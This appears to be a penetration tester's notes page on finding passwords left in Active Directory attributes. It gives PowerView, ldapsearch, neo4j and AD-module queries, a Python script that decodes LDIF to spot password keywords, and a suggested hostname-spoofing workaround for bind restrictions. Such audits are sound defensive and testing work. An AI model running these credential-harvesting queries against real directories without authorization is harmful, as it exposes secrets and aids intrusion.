Passwords in Active Directory attributes
In order to search through users or objects you need to
Interesting attributes to search for (remember these can be set on either a computer or a user object):
comment
description
userPassword
unixUserPassword
unicodePwd
msSFU30Password
Other attributes that may be interesting:
adminDescription
dBCSPwd
lmPwdHistory
ntPwdHistory
supplementalCredentials
Note that unicodePwd, dBCSPwd, lmPwdHistory, ntPwdHistory and supplementalCredentials hold the actual password hashes and key material and are never returned over LDAP, whatever rights your account has; they are only readable through directory replication (DCSync). Including them in a filter is harmless but will not produce results. Passwords turn up in practice in the free-text fields (comment, description, info, adminDescription) and in the legacy or application-populated fields (userPassword, unixUserPassword, msSFU30Password), which may hold cleartext.
Using PowerView
Get-DomainUser -Domain evilcorp.local -Properties samaccountname,comment,description,userpassword,unixuserpassword,unicodepwd,mssfu30password,admindescription,dbcspwd,lmpwdhistory,ntpwdhistory,supplementalcredentials -LDAPFilter '(|(comment=*)(description=*)(userpassword=*)(unixuserpassword=*)(unicodepwd=*)(mssfu30password=*)(admindescription=*)(dbcspwd=*)(lmpwdhistory=*)(ntpwdhistory=*)(supplementalcredentials=*))' | Format-List > C:\attributes.txt
Get-DomainUser only returns user objects; run the same -Properties and -LDAPFilter through Get-DomainComputer to cover computer accounts as well.
Using an LDAP query
ldapsearch -x -h evilcorp.local -w SecretPassword -b "dc=evilcorp,dc=local" -D "cn=Philip L,cn=users,dc=evilcorp,dc=local" "(|(userPassword=*)(unixUserPassword=*)(unicodePwd=*)(msSFU30Password=*)(adminDescription=*)(lmPwdHistory=*)(ntPwdHistory=*)(supplementalCredentials=*))" userPassword unixUserPassword unicodePwd msSFU30Password adminDescription lmPwdHistory ntPwdHistory supplementalCredentials
The -x flag selects a simple bind; without it ldapsearch attempts a SASL bind and the -D/-w pair is not used the way you expect. OpenLDAP 2.5 and later have dropped -h; use -H ldap://evilcorp.local there instead.
These queries generate a lot of results, so you either go through them one by one or grep for relevant words. If the LDAP server enforces a maximum result size (Active Directory's default MaxPageSize is 1000 entries), it caps the response at that size. To get around that without issuing huge queries, request paged results: -E pr=500/prompt fetches 500 entries at a time and prompts you before fetching the next page (pr=500/noprompt streams all pages without pausing).
If a value contains characters outside printable ASCII, such as åäö, ldapsearch prints it base64-encoded after a double colon (description:: ...), so a plain grep over the output will not see those values until they are decoded.
ldapsearch -x -E pr=500/prompt -h evilcorp.local -w SecretPassword -b "dc=evilcorp,dc=local" -D "cn=Philip L,cn=users,dc=evilcorp,dc=local" "(|(description=*)(comment=*)(info=*))" description comment info | tee results.txt
grep -i 'pwd\|passw\|lösen\|losen\|somma\|vinter' results.txt
(lösen/losen is Swedish for password, and somma(r)/vinter are the seasons that end up in far too many passwords; adjust the word list to the target's language.)
Or you can perform the keyword search in the LDAP filter itself; substring matches on description and comment are case-insensitive in Active Directory, so *passw* also matches Password:
ldapsearch -x -h evilcorp.local -w SecretPassword -b "dc=evilcorp,dc=local" -D "cn=Philip L,cn=users,dc=evilcorp,dc=local" "(|(description=*passw*)(description=*lösen*)(description=*losen*)(comment=*passw*)(comment=*lösen*)(comment=*losen*))" description comment
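Because ldapsearch base64-encodes any value containing åäö and folds long lines, grepping the raw results.txt misses exactly the Swedish hits the word list above is written for. The script below is an added example (it is not from the original notes) that unfolds and decodes the LDIF that ldapsearch writes, then runs the same keyword search over the decoded values, stripping diacritics first so that lösen and losen are one keyword. The embedded sample output, including the DNs and attribute values, is constructed for the example; the attribute and keyword lists are the ones used above.

```python
"""Unfold and decode ldapsearch LDIF output, then grep the decoded values.

ldapsearch prints values that are not SAFE-STRINGs (e.g. containing åäö) as
base64 after a double colon and folds long lines onto continuation lines that
start with one space; both hide hits from a plain grep over results.txt.
"""
import base64
import re
import unicodedata
from collections import defaultdict

# Free-text attributes queried in the notes above.
TEXT_ATTRS = ("description", "comment", "info", "adminDescription")
# Word list from the grep above: lösen = Swedish for password, somma(r)/vinter =
# summer/winter. Diacritics are stripped before matching, so "lösen" covers "losen".
KEYWORDS = ("pwd", "passw", "lösen", "somma", "vinter")

# Constructed sample of what ldapsearch writes to results.txt (made-up DNs and
# values). The base64 value decodes to "Lösenord: Sommar2020!".
SAMPLE_LDIF = """\
# Philip L, Users, evilcorp.local
dn: CN=Philip L,CN=Users,DC=evilcorp,DC=local
description: Temporary pwd Winter2019! set by helpdesk
info: desk 4B

# svc-backup, Users, evilcorp.local
dn: CN=svc-backup,CN=Users,DC=evilcorp,DC=local
description:: TMO2c2Vub3JkOiBTb21tYXIyMDIwIQ==
comment: Backup service account, owner is the storage team and the new
  contact is on the wiki

# search result
search: 2
result: 0 Success
"""

# attribute, separator (":" plain, "::" base64, ":<" URL reference), value
LINE_RE = re.compile(r"^([A-Za-z][A-Za-z0-9.;\-]*)(:<|::?) ?(.*)$")


def normalize(text):
    """Casefold and strip diacritics so 'LÖSEN' and 'losen' compare equal."""
    decomposed = unicodedata.normalize("NFKD", text)
    return "".join(c for c in decomposed if not unicodedata.combining(c)).casefold()


def unfold(ldif):
    """Join LDIF continuation lines: a leading single space continues the previous line."""
    lines = []
    for raw in ldif.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def parse_ldif(ldif):
    """Return one {attribute: [values]} dict per entry that carries a dn; decodes
    'attr:: base64' values and skips comments, 'attr:< url' references and the
    dn-less 'search:'/'result:' trailer that ldapsearch appends."""
    entries = []
    current = defaultdict(list)
    for line in unfold(ldif) + [""]:  # the sentinel flushes the last entry
        if not line.strip():
            if "dn" in current:
                entries.append(dict(current))
            current = defaultdict(list)
            continue
        if line.startswith("#"):
            continue
        m = LINE_RE.match(line)
        if not m:
            continue
        attr, sep, value = m.groups()
        if sep == ":<":
            continue
        if sep == "::":
            value = base64.b64decode(value).decode("utf-8", errors="replace")
        current[attr].append(value)
    return entries


def find_hits(entries, attrs=TEXT_ATTRS, keywords=KEYWORDS):
    """Return (dn, attribute, decoded value, keyword) for every value matching a keyword."""
    wanted = {a.lower() for a in attrs}
    hits = []
    for entry in entries:
        dn = entry["dn"][0]
        for attr, values in entry.items():
            if attr.lower() not in wanted:
                continue
            for value in values:
                nv = normalize(value)
                for kw in keywords:
                    if normalize(kw) in nv:
                        hits.append((dn, attr, value, kw))
                        break
    return hits


if __name__ == "__main__":
    # Scans the constructed sample; swap in open("results.txt", encoding="utf-8").read()
    for dn, attr, value, kw in find_hits(parse_ldif(SAMPLE_LDIF)):
        print(f"{dn}\n  {attr} [{kw}]: {value}")
```

Point it at the real output by replacing SAMPLE_LDIF with the contents of results.txt, as the comment in the main block notes. It reports the DN, the attribute and the keyword that matched, so the base64-encoded description of svc-backup shows up as Lösenord: Sommar2020! instead of an opaque TMO2... line that no grep would have flagged.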
Debugging problems
If you receive this error it means that your user is not allowed to authenticate to the LDAP server from your host:
additional info: 80090308: LdapErr: DSID-0C09042A, comment: AcceptSecurityContext error, data 531, v3839
The relevant part is data 531, which is ERROR_INVALID_WORKSTATION (other values you will see in the same position: 52e for bad credentials, 533 for a disabled account, 775 for a locked-out account). AD users have an attribute called userWorkstations, which specifies from which workstations the user is allowed to log on. Since your Linux machine's hostname is not among those listed in the userWorkstations attribute, the bind is refused.
A possible workaround, that I have not tested but might work, is to change the hostname to one that is listed in the user's userWorkstations attribute. This presents a catch-22, because you need LDAP access to find out which userWorkstations are allowed.
Using Bloodhound and bash
If the domain has already been collected with SharpHound, the description attribute is stored on the nodes it collected and can be pulled straight from neo4j; the WHERE clause drops the nodes that have no description set:
echo "MATCH (a) WHERE a.description IS NOT NULL RETURN a.description;" | /usr/share/neo4j/bin/cypher-shell -u neo4j -p <creds> --format plain | sort -u
Using ActiveDirectory module
# This will only search a specific OU, returning the users there that have a comment set
Get-ADUser -Filter 'comment -like "*"' -SearchBase "OU=Users OU,DC=hackdomain,DC=local" -Properties comment
# This will search the whole domain
Get-ADUser -Filter 'comment -like "*"' -SearchBase "DC=hackdomain,DC=local" -Properties comment